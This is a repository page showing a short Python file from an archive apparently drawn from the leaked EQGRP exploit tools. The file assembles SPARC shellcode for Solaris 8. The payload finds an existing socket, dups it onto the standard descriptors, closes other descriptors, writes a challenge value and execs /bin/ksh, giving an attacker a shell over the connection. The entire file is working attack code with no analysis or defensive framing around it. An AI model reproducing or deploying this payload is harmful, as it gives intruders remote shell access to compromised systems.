yetangitu/EQGRP
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity
EQGRP/archive_files/esna/solaris8shellcode.py

62 lines
1.3 KiB
Python
Raw Blame History

#!/usr/bin/python
find_self = \
"\x20\xbf\xff\xff\x20\xbf\xff\xff"
o7 = \
"\x7f\xff\xff\xff\x96\x1a\xc0\x0b"
get_socket = \
"\xe2\x03\xe0\x94\xe2\x04\x40\x0b\xe4\x03\xe0\x98\xd0\x04\x40\x12"\
"\xa6\x10\x20\x03"
dup2_loop = \
"\x92\x10\x20\x09\x94\x04\xff\xff\x82\x10\x20\x3e\xa6\x84\xff\xff"\
"\x12\xbf\xff\xfc\x91\xd0\x20\x08"
close_descriptors_setup = \
"\xa4\x1b\xc0\x0f\xa6\x10\x20\x03\xa8\x10\x20\xff"
close_descriptors = \
"\x90\x14\x80\x13\x82\x10\x20\x06\x91\xd0\x20\x08\x80\xa4\xc0\x14"\
"\x06\xbf\xff\xfc\xa6\x24\xff\xff"
write_challenge = \
"\x94\x10\x20\x04\x92\x03\xe0\x9c\x90\x10\x20\x01\x82\x10\x20\x04"\
"\x91\xd0\x20\x08"
shellcode = \
"\x90\x03\xe0\xa0\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10"\
"\xc0\x22\x20\x14\x82\x10\x20\x0b\x91\xd0\x20\x08"
exit = \
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"
stackbase = \
"\xff\xff\xff\xff"
socket_offset = \
"\xff\xff\xff\xff"
challenge = \
"\xff\xff\xff\xff"
ksh = \
"\x2f\x62\x69\x6e\x2f\x6b\x73\x68"
def build():
tmp = \
find_self + \
o7 + \
get_socket + \
dup2_loop + \
close_descriptors_setup + \
close_descriptors + \
write_challenge + \
shellcode + \
exit + \
stackbase + \
socket_offset + \
challenge + \
ksh
return tmp
Reference in a new issue View git blame Copy permalink